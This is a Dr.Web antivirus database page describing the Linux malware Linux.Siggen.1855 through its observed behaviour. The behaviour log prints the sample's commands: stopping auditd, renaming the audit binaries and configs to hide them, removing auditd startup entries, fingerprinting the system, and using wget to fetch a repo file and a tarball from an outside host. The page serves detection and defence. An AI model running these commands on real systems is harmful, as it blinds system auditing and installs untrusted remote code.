Per il corretto funzionamento del sito, è necessario attivare il supporto di JavaScript nel browser.
Linux.Siggen.1855
Aggiunto al database dei virus Dr.Web:
2019-06-21
La descrizione è stata aggiunta:
2019-06-21
Technical Information
Malicious functions:
Performs process tracing:
<SAMPLE>
<SAMPLE_FULL_PATH>
Manages services:
/sbin/service auditd stop
/sbin/service wsosstatd stop
Launches processes:
/bin/bash <SAMPLE_FULL_PATH> -c exec '<SAMPLE_FULL_PATH>' \"$@\" <SAMPLE_FULL_PATH>
<SAMPLE_FULL_PATH>
/bin/bash <SAMPLE_FULL_PATH> -c
cat /etc/issue
head -n 1
grep -iE Red.*release 4|CentOS.*4\.
grep -iE Red.*release 4|CentOS.*4\. /etc/redhat-release
grep -iE Red.*release 5|CentOS.*5\.
grep -iE Red.*release 5|CentOS.*5\. /etc/redhat-release
grep -iE Red.*release 6|CentOS.*6\.
grep -iE Red.*release 6|CentOS.*6\. /etc/redhat-release
/sbin/ifconfig -a
grep inet
grep -v 127.0.0.1
grep -v inet6
grep -v ^169.254
tr -d addr:
wc -l
sed s/\([0-9]\+\.[0-9]\+\.[0-9]\+\)\.[0-9]\+/\1/g
awk {print $2}
sleep 5
wget -e -http-proxy= -t 2 -T 50 http://wsautoinstall1.lxdns.com/ws.repo -O /etc/yum.repos.d/ws.repo
grep already
mkdir -p /var/lib/local/etc/WsCdnOsStatLog/LogSummary/wsosstad/.wsosstat/
mv /etc/audisp/audispd.conf /etc/audisp/wsosstatdispd.conf
mv /etc/audit/audit.rules /etc/audit/wsosstat.acl
mv /etc/audit/auditd.conf /etc/audit/wsosstatd.conf
mv /etc/rc.d/init.d/auditd /etc/rc.d/init.d/wsosstatd
mv /etc/sysconfig/auditd /etc/sysconfig/wsosstatd
mv /etc/audisp /etc/wsosstatdisp
mv /etc/audit /etc/wsosstat
mv /sbin/audispd /sbin/wsosstatdispd
mv /sbin/auditctl /sbin/wsosstatctl
mv /sbin/auditd /sbin/wsosstatd
mv /sbin/aureport /sbin/wsosstatreport
mv /sbin/ausearch /sbin/wsosstatsearch
mv /sbin/autrace /sbin/wsosstattrace
mv /usr/bin/aulastlog /usr/bin/wsosstatlastlog
mv /usr/bin/ausyscall /usr/bin/wsosstatsyscall
/sbin/chkconfig --add wsosstatd
xargs -i rm -rf {}
find /etc/rc.d -name *auditd*
wget -e -http-proxy= -t 2 -T 50 http://wsautoinstall1.lxdns.com/tools/wsosstat.tar.gz -O /tmp/wsosstat.tar.gz
Kills the following processes:
<SAMPLE>
<SAMPLE_FULL_PATH>
Performs operations with the file system:
Creates folders:
/var/lib/local
/var/lib/local/etc
/var/lib/local/etc/WsCdnOsStatLog
/var/lib/local/etc/WsCdnOsStatLog/LogSummary
/var/lib/local/etc/WsCdnOsStatLog/LogSummary/wsosstad
/var/lib/local/etc/WsCdnOsStatLog/LogSummary/wsosstad/.wsosstat
Creates or modifies files:
/etc/yum.repos.d/ws.repo
/tmp/wsosstat.tar.gz
Network activity:
Establishes connection:
HTTP GET requests:
ws###########1.lxdns.com/tools/wsosstat.tar.gz
DNS ASK:
Other:
Collects OS information
Collects RAM information
Curing recommendations
Linux
Free trial
One month (no registration) or three months (registration and renewal discount)
Scaricate Dr.Web per Android
Gratis per 3 mesi
Tutti i componenti di protezione
Rinnovo versione di prova tramite AppGallery/Google Pay
Continuando a utilizzare questo sito, l'utente acconsente al nostro utilizzo di file Cookie e di altre tecnologie per la raccolta di informazioni statistiche sui visitatori. Per maggiori informazioni
OK